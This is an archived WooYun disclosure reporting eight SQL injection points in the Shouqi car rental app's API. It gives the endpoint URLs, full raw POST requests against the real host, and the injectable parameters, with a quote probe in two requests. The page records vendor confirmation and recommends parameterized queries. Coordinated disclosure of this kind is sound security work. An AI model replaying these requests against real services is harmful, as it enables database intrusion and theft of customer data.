当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0169545

漏洞标题:首汽租车SQL注入大大大礼包

相关厂商:首汽租车

漏洞作者: 采花大盗

提交时间:2016-01-13 11:37

修复时间:2016-02-27 11:49

公开时间:2016-02-27 11:49

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-13: 细节已通知厂商并且等待厂商处理中
2016-01-14: 厂商已经确认,细节仅向厂商公开
2016-01-24: 细节向核心白帽子及相关领域专家公开
2016-02-03: 细节向普通白帽子公开
2016-02-13: 细节向实习白帽子公开
2016-02-27: 细节向公众公开

简要描述:

首汽租车APP SQL注入大大大礼包,目前发现八处!!!

详细说明:

注入点一:
URL:

http://yingzhang.izuche.com:8087/BaseDataJson.asmx/GetStorebyDistrictID


数据包:

POST /BaseDataJson.asmx/GetStorebyDistrictID HTTP/1.1
Host: yingzhang.izuche.com:8087
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
Accept: */*
User-Agent: iZuChe/3.0.2 (iPhone; iOS 8.4.1; Scale/2.00)
Accept-Language: zh-Hans;q=1, en;q=0.9
Accept-Encoding: gzip, deflate
Content-Length: 23
districtID=5&reserved=


districtID参数存在注入

QQ20160113-0.jpg


QQ20160113-1.jpg


注入点二:
URL:

http://yingzhang.izuche.com:8087/BaseDataJson.asmx/GetStoreInfoByStoreID


数据包:

POST /BaseDataJson.asmx/GetStoreInfoByStoreID HTTP/1.1
Host: yingzhang.izuche.com:8087
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
Accept: */*
User-Agent: iZuChe/3.0.2 (iPhone; iOS 8.4.1; Scale/2.00)
Accept-Language: zh-Hans;q=1, en;q=0.9
Accept-Encoding: gzip, deflate
Content-Length: 28
reserved=1&storeid=10100821


storeid参数存在注入

QQ20160113-2.jpg


QQ20160113-3.jpg


注入点三:
URL:

http://yingzhang.izuche.com:8087/OrderJson.asmx/GetCheckOrderInfo


数据包:

POST /OrderJson.asmx/GetCheckOrderInfo HTTP/1.1
Host: yingzhang.izuche.com:8087
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
Accept: */*
User-Agent: iZuChe/3.0.2 (iPhone; iOS 8.4.1; Scale/2.00)
Accept-Language: zh-Hans;q=1, en;q=0.9
Accept-Encoding: gzip, deflate
Content-Length: 167
customerid=1&jsonString=%7B%22GetCarDate%22%3A%222016-01-13%2001%3A30%22%2C%22ReturnCarDate%22%3A%222016-01-15%2001%3A30%22%2C%22PackageType%22%3A%220%22%7D&reserved=2


customerid参数存在注入

QQ20160113-4.jpg


QQ20160113-5.jpg


注入点四:
URL:

http://yingzhang.izuche.com:8087/ProductsJson.asmx/SearchCustomizeRentalDailyNew


数据包:

POST /ProductsJson.asmx/SearchCustomizeRentalDailyNew HTTP/1.1
Host: yingzhang.izuche.com:8087
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
Accept: */*
User-Agent: iZuChe/3.0.2 (iPhone; iOS 8.4.1; Scale/2.00)
Accept-Language: zh-Hans;q=1, en;q=0.9
Accept-Encoding: gzip, deflate
Content-Length: 289
jsonForm=%7B%22returnCarStore%22%3A%2210100821%22%2C%22getCarDate%22%3A%222016-01-13%2001%3A30%22%2C%22packtype%22%3A%220%22%2C%22getCarStore%22%3A%2210100821%22%2C%22returnCarDate%22%3A%222016-01-15%2001%3A30%22%2C%22returnCarCity%22%3A%221%22%2C%22getCarCity%22%3A%221%22%7D&reserved=1


jsonForm参数存在注入

QQ20160113-6.jpg


注入点五:
URL:

http://yingzhang.izuche.com:8087/ORderJson.asmx/GetDataServiceDiscountList


数据包:

POST /ORderJson.asmx/GetDataServiceDiscountList HTTP/1.1
Host: yingzhang.izuche.com:8087
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
Accept: */*
User-Agent: iZuChe/3.0.2 (iPhone; iOS 8.4.1; Scale/2.00)
Accept-Language: zh-Hans;q=1, en;q=0.9
Accept-Encoding: gzip, deflate
Content-Length: 342
customerID=407116&jsonString=%7B%22GetCarCity%22%3A%221%22%2C%22CarTypeID%22%3A%22166%22%2C%22GetCarDate%22%3A%222016-01-13%2001%3A30%22%2C%22PackageType%22%3A%220%22%2C%22ReturnCarCity%22%3A%221%22%2C%22GetCarStore%22%3A%2210100821%22%2C%22ReturnCarStore%22%3A%2210100821%22%2C%22ReturnCarDate%22%3A%222016-01-15%2001%3A30%22%7D&reserved=1


customerID参数存在注入

QQ20160113-7.jpg


注入点六:
URL:

http://yingzhang.izuche.com:8087/CustomersJson.asmx/GetCustomerInfo


数据包:

POST /CustomersJson.asmx/GetCustomerInfo HTTP/1.1
Host: yingzhang.izuche.com:8087
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
Accept: */*
User-Agent: iZuChe/3.0.2 (iPhone; iOS 8.4.1; Scale/2.00)
Accept-Language: zh-Hans;q=1, en;q=0.9
Accept-Encoding: gzip, deflate
Content-Length: 29
mobile=13800138000'&reserved=


mobile参数存在注入

QQ20160113-8.jpg


注入点七:
URL:

http://yingzhang.izuche.com:8087/CustomersJson.asmx/GetCustomerOrderList


数据包:

POST /CustomersJson.asmx/GetCustomerOrderList HTTP/1.1
Host: yingzhang.izuche.com:8087
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
Accept: */*
User-Agent: iZuChe/3.0.2 (iPhone; iOS 8.4.1; Scale/2.00)
Accept-Language: zh-Hans;q=1, en;q=0.9
Accept-Encoding: gzip, deflate
Content-Length: 81
CustomerID=407116&OrderSource=&OrderStatus=&OrderType=0&PrepaidStatus='&reserved=


CustomerID、OrderSource、OrderStatus、OrderType、PrepaidStatus参数均存在注入

QQ20160113-9.jpg


注入点八:
URL:

http://yingzhang.izuche.com:8087/CustomersJson.asmx/OrderCancel


数据包:

POST /CustomersJson.asmx/OrderCancel HTTP/1.1
Host: yingzhang.izuche.com:8087
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
Accept: */*
User-Agent: iZuChe/3.0.2 (iPhone; iOS 8.4.1; Scale/2.00)
Accept-Language: zh-Hans;q=1, en;q=0.9
Accept-Encoding: gzip, deflate
Content-Length: 29
MainOrderID=130000&reserved=


MainOrderID参数存在注入

QQ20160113-10.jpg

漏洞证明:

QQ20160113-1.jpg


QQ20160113-3.jpg


QQ20160113-5.jpg

修复方案:

参数化操作数据库

版权声明:转载请注明来源 采花大盗@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2016-01-14 13:26

厂商回复:

感谢您的反馈,我们正在进行处理。

最新状态:

暂无


漏洞评价:

评价